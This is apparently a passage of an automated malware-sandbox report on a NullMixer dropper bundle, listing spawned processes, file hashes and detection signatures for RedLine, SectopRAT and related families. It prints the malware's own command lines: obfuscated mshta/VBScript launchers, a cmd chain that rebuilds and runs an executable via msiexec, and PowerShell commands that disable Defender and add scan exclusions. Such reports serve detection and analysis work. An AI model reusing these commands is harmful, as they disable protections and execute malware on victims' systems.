C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue192762f1cd058ddf8.exe
Tue192762f1cd058ddf8.exe
C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19c1338f41ab.exe
Tue19c1338f41ab.exe
C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19411ac950924ec3f.exe
Tue19411ac950924ec3f.exe
C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19f51bcd77a.exe
Tue19f51bcd77a.exe
C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue1969586bcbf58493.exe
Tue1969586bcbf58493.exe
C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19b4ef3b53293fe.exe
Tue19b4ef3b53293fe.exe
C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19761b3b8d9d.exe
Tue19761b3b8d9d.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3228 -s 620
C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue195c40958f528163.exe
Tue195c40958f528163.exe
C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19c78ded4d176ac.exe
Tue19c78ded4d176ac.exe
C:\Users\Admin\AppData\Local\Temp\is-IDINK.tmp\Tue19879c4c0e.tmp
"C:\Users\Admin\AppData\Local\Temp\is-IDINK.tmp\Tue19879c4c0e.tmp" /SL5="$100030,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19879c4c0e.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbscrIPt: CLOsE( crEATeObjEcT( "wsCRipt.SheLl" ). RUN ( "C:\Windows\system32\cmd.exe /q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue193858933525b62.exe"" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if """" == """" for %x In ( ""C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue193858933525b62.exe"" ) do taskkill -iM ""%~nXx"" /f " ,0 , TRuE ))
C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19f51bcd77a.exe
C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19f51bcd77a.exe
C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19761b3b8d9d.exe
C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19761b3b8d9d.exe
C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue195c40958f528163.exe
C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue195c40958f528163.exe
C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19879c4c0e.exe
"C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19879c4c0e.exe" /SILENT
C:\Users\Admin\AppData\Local\Temp\is-T76J3.tmp\Tue19879c4c0e.tmp
"C:\Users\Admin\AppData\Local\Temp\is-T76J3.tmp\Tue19879c4c0e.tmp" /SL5="$70110,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19879c4c0e.exe" /SILENT
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /q /C tYPe "C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue193858933525b62.exe" > ~Xy1GPomKV09sC.Exe &&stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if "" == "" for %x In ("C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue193858933525b62.exe") do taskkill -iM "%~nXx" /f
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2852 -ip 2852
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2852 -s 360
C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe
~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ
C:\Windows\SysWOW64\taskkill.exe
taskkill -iM "Tue193858933525b62.exe" /f
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbscrIPt: CLOsE( crEATeObjEcT( "wsCRipt.SheLl" ). RUN ( "C:\Windows\system32\cmd.exe /q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe"" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if ""-PyARgXd6fRp1GJRov7bdbpPssZBLJ "" == """" for %x In ( ""C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe"" ) do taskkill -iM ""%~nXx"" /f " ,0 , TRuE ))
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /q /C tYPe "C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe" > ~Xy1GPomKV09sC.Exe &&stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if "-PyARgXd6fRp1GJRov7bdbpPssZBLJ " == "" for %x In ("C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe") do taskkill -iM "%~nXx" /f
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscrIpt: cLosE (cREatEObjEcT ( "wscript.sHeLl" ).Run ( "cMD.ExE /R ECHO | seT /P = ""MZ"" > F3U_R.J & CoPy /B /Y F3U_R.J+ RqC~~.A + TfSAy.w+ y5ULsw.L6+ AobbVRP.2Y + WvAi.2 BENCc.E & Start msiexec -Y .\bENCc.E " , 0 ,TruE ) )
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /R ECHO | seT /P = "MZ" >F3U_R.J & CoPy /B /Y F3U_R.J+ RqC~~.A + TfSAy.w+y5ULsw.L6+ AobbVRP.2Y + WvAi.2 BENCc.E &Start msiexec -Y .\bENCc.E
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" seT /P = "MZ" 1>F3U_R.J"
C:\Windows\SysWOW64\msiexec.exe
msiexec -Y .\bENCc.E
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffaddeccc40,0x7ffaddeccc4c,0x7ffaddeccc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1924,i,14093976459940165328,12896074352318300665,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1920 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2156,i,14093976459940165328,12896074352318300665,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2188 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2256,i,14093976459940165328,12896074352318300665,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2272 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3152,i,14093976459940165328,12896074352318300665,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3172 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3296,i,14093976459940165328,12896074352318300665,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3316 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4580,i,14093976459940165328,12896074352318300665,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4568 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4708,i,14093976459940165328,12896074352318300665,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4720 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4712,i,14093976459940165328,12896074352318300665,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4688 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4976,i,14093976459940165328,12896074352318300665,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3728 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3292,i,14093976459940165328,12896074352318300665,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4716 /prefetch:8
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5244,i,14093976459940165328,12896074352318300665,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5240 /prefetch:8
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\dwm.exe
"dwm.exe"
Network
Files
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 338018fd5d698de91190cc4fcbde4359 |
| SHA1 | d4fd3615efa87a949c4c058135bbbb1d20084ddf |
| SHA256 | 5b33eac2b4ccf626bb59646ac80c9f85655499439979e6d46dea41f2f452885f |
| SHA512 | 2f039a5216d9b566f4feed8ac50789ccfc691ef4775f8005e208ae7f82cfb9f894c01af225e8c03be72317258fef29a424fb95418d6dcff2d3f5bc143e2b5e7e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 6e9bccc4c404c51477a1ca6fd92d8ebe |
| SHA1 | cfc801a34de3899259e6f90dea25e1b62dc2f864 |
| SHA256 | 33ffa570c6042749fa37fd9512a833af81a8b892a9f6e1f510dd9f7a6ee5da24 |
| SHA512 | c23cfcca2e6fcd3ed14e12aef8bd3dc716f241b14617b3714b957e5c3a2b1e4e245ab80699700f6ed02a6bf60e79a57e44d382018e4c04f170710f29201d7132 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
| MD5 | 4cf6f2dd49824825bb0b21a0e486be44 |
| SHA1 | 2e4c878492cb96b0e2cedbabaaaddf05399ebb8d |
| SHA256 | 14bf48a5c4f85aaade5008aaded3e8d98afa3e98aecca4b623d496d6f636a798 |
| SHA512 | 35d2b684791c2693dcb4598960270239762f7c927a782980efaa4ffc5806a07c514a112c7ae3a46c1fdb97a6b845f65dc29da606d92e07291354b8325ae08ba5 |
C:\Users\Admin\AppData\Local\Temp\scoped_dir4384_756635860\ee05ed80-c056-44a0-bcbd-b5f79dec994f.tmp
| MD5 | da75bb05d10acc967eecaac040d3d733 |
| SHA1 | 95c08e067df713af8992db113f7e9aec84f17181 |
| SHA256 | 33ae9b8f06dc777bb1a65a6ba6c3f2a01b25cd1afc291426b46d1df27ea6e7e2 |
| SHA512 | 56533de53872f023809a20d1ea8532cdc2260d40b05c5a7012c8e61576ff092f006a197f759c92c6b8c429eeec4bb542073b491ddcfd5b22cd4ecbe1a8a7c6ef |
memory/4308-414-0x00000000030D0000-0x0000000003162000-memory.dmp
memory/4308-415-0x0000000003170000-0x0000000003D6B000-memory.dmp
memory/4308-416-0x0000000003D70000-0x0000000003DFB000-memory.dmp
memory/4308-417-0x0000000003E00000-0x0000000003E87000-memory.dmp
memory/4308-420-0x0000000003E00000-0x0000000003E87000-memory.dmp
memory/4308-421-0x00000000032F0000-0x00000000032F1000-memory.dmp
memory/4308-422-0x00000000031F0000-0x00000000031F4000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState
| MD5 | ab7697fe6ef9b6fad0f58069dde8a52d |
| SHA1 | c25082b8f75f49f4e229cc272a04455bfea6e4cf |
| SHA256 | e109080cf13b6692aa7f2ddc032c6a56020034f314a9cc192dffedbde22247dd |
| SHA512 | b24a53d7f14fcc920128b7d128336a9c4a1d0b3aa980bc06f7d07e059e144c65b5a8bbf275bbd3ef0878733d080975f206568ba5d45dfd37ba5359a95ad381c1 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 2e1cdb10a291ce503d88dbec9957dece |
| SHA1 | 55a80b5e945353a628947fbfeecd17cce8ded83c |
| SHA256 | a2862149ed7ce96d678532d34e962add3a0a4fa17f4bce5923fadfa2350987f7 |
| SHA512 | 48b854d7defea2c96a38e8e8f2733dad5e6e66245b9df4b56bfdd736cf222ca61c14e0d00358adc563d25b432e2c6d39ab06066d9ad555523f3711d6a2c0fb23 |
memory/4308-461-0x000000006ED80000-0x000000006F004000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | 57e61628672197287a3cf4b80f5f5436 |
| SHA1 | f8dae62974be4da2f839bd1df7e3e021b0141685 |
| SHA256 | afb8eac981cfc26a0bad639be0aa1fc4e4e48c0866b62a82f37054127ee21c1f |
| SHA512 | ae74830363b4733a542a6a55b0a4ab502b7a7b834cc5b1ff9379fccfba885b3911e9eea343909aae36c02cbd8e41795bec124d4d2e99bb231731826dc758e34a |
Analysis: behavioral21
Detonation Overview
Submitted
2024-11-10 17:24
Reported
2024-11-10 17:27
Platform
win7-20240903-en
Max time kernel
149s
Max time network
152s
Command Line
Signatures
Detect Fabookie payload
Fabookie
Fabookie family
NullMixer
Nullmixer family
PrivateLoader
Privateloader family
RedLine
RedLine payload
Redline family
SectopRAT
SectopRAT payload
Sectoprat family
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
Executes dropped EXE
Loads dropped DLL
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1536 set thread context of 300 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed067ba5199af5f.exe | C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed067ba5199af5f.exe |
| PID 1424 set thread context of 980 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed068a6c101a0e81.exe | C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed068a6c101a0e81.exe |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed062272ee8a02b1746.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed06d8092a5ae.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed067fa7edd4b875a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\500e7e5c009d6087e16c49251fe574108267633fa8a0a72b489e07a7056ae644.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-2TOLQ.tmp\Wed067fa7edd4b875a.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed068a6c101a0e81.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed067ba5199af5f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed067fa7edd4b875a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed068a6c101a0e81.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed068cfd71e196da.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-MCLIP.tmp\Wed067fa7edd4b875a.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed0625413f2fb.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed0639114ac9fa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed06dffacb42ccf1c.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed067ba5199af5f.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-MCLIP.tmp\Wed067fa7edd4b875a.tmp | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed0625413f2fb.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed062a0488e6dd1.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\500e7e5c009d6087e16c49251fe574108267633fa8a0a72b489e07a7056ae644.exe
"C:\Users\Admin\AppData\Local\Temp\500e7e5c009d6087e16c49251fe574108267633fa8a0a72b489e07a7056ae644.exe"
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed067ba5199af5f.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed067fa7edd4b875a.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed06d8092a5ae.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed0639114ac9fa.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed068cfd71e196da.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed068a6c101a0e81.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed062a0488e6dd1.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed06384ea2548.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed0625413f2fb.exe
C:\Windows\SysWOW64\cmd.exe
